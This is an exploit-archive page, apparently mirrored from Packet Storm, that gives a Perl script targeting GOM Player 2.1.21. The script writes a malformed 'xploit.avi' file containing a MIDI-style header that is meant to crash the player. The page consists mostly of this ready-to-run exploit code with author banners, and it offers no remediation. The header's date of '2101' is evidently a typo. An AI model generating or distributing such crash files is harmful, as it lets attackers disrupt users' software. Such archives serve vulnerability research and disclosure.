Lucene search
+L

GOM Player 2.1.21 .avi Denial Of Service

🗓️ 16 Mar 2010 00:00:00Reported by Enigma7Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

GOM Player 2.1.21 .avi Denial Of Service Exploi

Code
`  
  
# Exploit Title: GOM PLAYER AVI File DoS  
# Date: 14/3/2101  
# Author: Enigma7  
# Software Link: www.gomlab.com/eng/<http://lab.com/eng/>‏  
# Version: V 2.1.21  
# Tested on: Windows XP SP3  
# CVE :  
# Code :  
  
  
  
#!/usr/bin/perl  
  
  
  
  
  
print "  
[~] GOM PLAYER V 2.1.21 -last- DoS (.avi file)  
[~] EN|GMA7 Team ~  
[~] By Z  
[~] www.enigma7.net<http://www.enigma7.net>  
";  
  
  
$bf = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";  
  
open(file, "> xploit.avi");  
print (file $bf);  
print "\n\n[+] Done!\n  
[+] AVI file created..\n  
[+] Z-at-Enigma7.net\n";  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation